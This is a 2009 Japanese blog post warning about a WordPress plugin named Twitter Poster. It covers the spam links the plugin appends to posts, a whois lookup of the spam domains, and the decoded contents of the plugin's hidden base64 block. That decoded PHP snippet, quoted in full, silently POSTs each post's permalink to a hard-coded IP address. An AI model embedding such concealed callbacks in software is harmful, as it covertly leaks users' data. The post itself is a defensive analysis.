怪しいWordPressプラグイン:Twitter Poster
「ついっこ」のwordpress_fanで、「このWordPress用プラグイン、怪しくね?」という話題が流れていた。
リンク1:twitter poster - Twitter Search
リンク2:@wordpress_fan Twitter Poster ヤバイっすね。...
リンク3:twitter-poster.php の base64 エンコードされている部分を展開したソース...
この問題のプラグインはTwitter Posterと呼ばれるプラグインであるが、2007年の11月4日にTechCrunchで紹介(原文)されていたTwitter Posterとはまったく別物なのでややこしい。
もちろん、TechCrunchで紹介されたTwitter Posterの中の人と、WordPressプラグインのTwitter Posterの作者は全然違う人である。
そこで、このプラグインを調べてみた。
リンク1:twitter poster - Twitter Search
リンク2:@wordpress_fan Twitter Poster ヤバイっすね。...
リンク3:twitter-poster.php の base64 エンコードされている部分を展開したソース...
この問題のプラグインはTwitter Posterと呼ばれるプラグインであるが、2007年の11月4日にTechCrunchで紹介(原文)されていたTwitter Posterとはまったく別物なのでややこしい。
もちろん、TechCrunchで紹介されたTwitter Posterの中の人と、WordPressプラグインのTwitter Posterの作者は全然違う人である。
そこで、このプラグインを調べてみた。
このプラグインの方がSCAM(詐欺)だと主張しているサイトが見つかった。
リンク:Automatic Twitter Poster Plugin for WordPress is a SCAM | theDomz.com
# 何の前振りも無しでいきなりかよ...
このプラグイン経由での投稿では自動的に特定のサイトを指すTinyURLが付加されることも指摘されているが、なんといっても問題は、該当プラグインの先頭にあるbase64エンコードされた部分のコード。
このbase64エンコードされたコードをデコードして確認してみると、エンコードされているコード中にlibcurlでHTTP POSTを発行している部分がある。
$curl_handle = curl_init(); $encoded_link = urlencode($link); $referrer = $link; curl_setopt($curl_handle, CURLOPT_URL, "http://72.9.228.239/get_link_info.php?source=$encoded_link"); curl_setopt($curl_handle, CURLOPT_POST, true); curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($curl_handle, CURLOPT_REFERER, $referrer); $data = curl_exec($curl_handle); $http_status = curl_getinfo($curl_handle, CURLINFO_HTTP_CODE);
IPアドレス「72.9.228.239」って誰?
→このアドレスはGNAX(http://www.gnax.net/)という米国ジョージア州のプロバイダ配下のアドレスらしい。
で、このあやしいHTTP POSTの前後を見ると、どうやら、送信している情報はget_link_info.phpに渡しているQueryString「?source=$encoded_link」という情報だけらしい。
この変数「$encoded_link」は該当コードの付近を読んでみると、どうやら、WordPressのPostIDで返されるPermaLinkがセットされており、これだけであれば、それほど大きな問題ではないが、何でHTTP POSTなんだろう?
もし、このHTTP POSTの目的が利用者のリファラ(というかTwitterに投稿されるPermalink)を収集するのが目的であれば、POST処理にする必然性はどこにもない。
というか、不必要なHTTP POSTは利用者の不安を煽るだけなので、HTTP GETを使ってない以上、SCAM(詐欺)と言われても仕方が無いと思われ。
最も、上記PHPコード中に
curl_setopt($curl_handle, CURLOPT_POSTFIELDS, $xxxxxx);
という文があると完全にクロであるが...
一応、WordPress.orgの日本語フォーラムには注意が上がっている模様。
リンク:WordPress › フォーラム » Twitter Poster プラグインは危険!
で、本家のフォーラムを見ると...
リンク:WordPress › Support » Tags — twitter-poster
どう見ても開き直りです。ありが(ry
# ある情報がスパムか否かは情報の受信側が決めるのであって、送信側ではない。
あと、このプラグインが詐欺と主張しているサイトで、スパムリンクとしてあげられているホストのwhoisを調べてみた。
該当ホストには「baby-parenting.co.uk」や「abc-baby-names.com」なんてのがあるが、IrelandのKevin Baylanという人が該当ドメインの登録者となっている。
■追記
なお、theDomz.comのエントリ中には、この怪しいHTTP POSTの変数を削除した安全な版へのリンクも紹介されている。
●お探し物は見つかりましたか?まだの方は以下の検索をご利用下さい。
●当ブログのRSSフィードをお手持ちのRSSリーダーにご登録いただくと、エントリ追加時のみ更新通知が届くため、確認の手間が省けます。よろしければ、どうぞ。
●当ブログの更新情報+α(deliciousのブックマーク他)はTwitter経由でも確認できます。是非フォローしてください。(実はRSSフィードよりも更新が早かったりします)
| 固定リンク
「Spam系」カテゴリの記事
- Twitterにやってくるスパマー達について(2009.09.25)
- 怪しいWordPressプラグイン:Twitter Poster(2009.03.12)
- Mixed MediaのIPからスパム(2006.04.29)
- 中国の迷惑業者【犯罪者達】(2008.12.11)
- オンライン犯罪の勘定書(2008.12.01)




コメント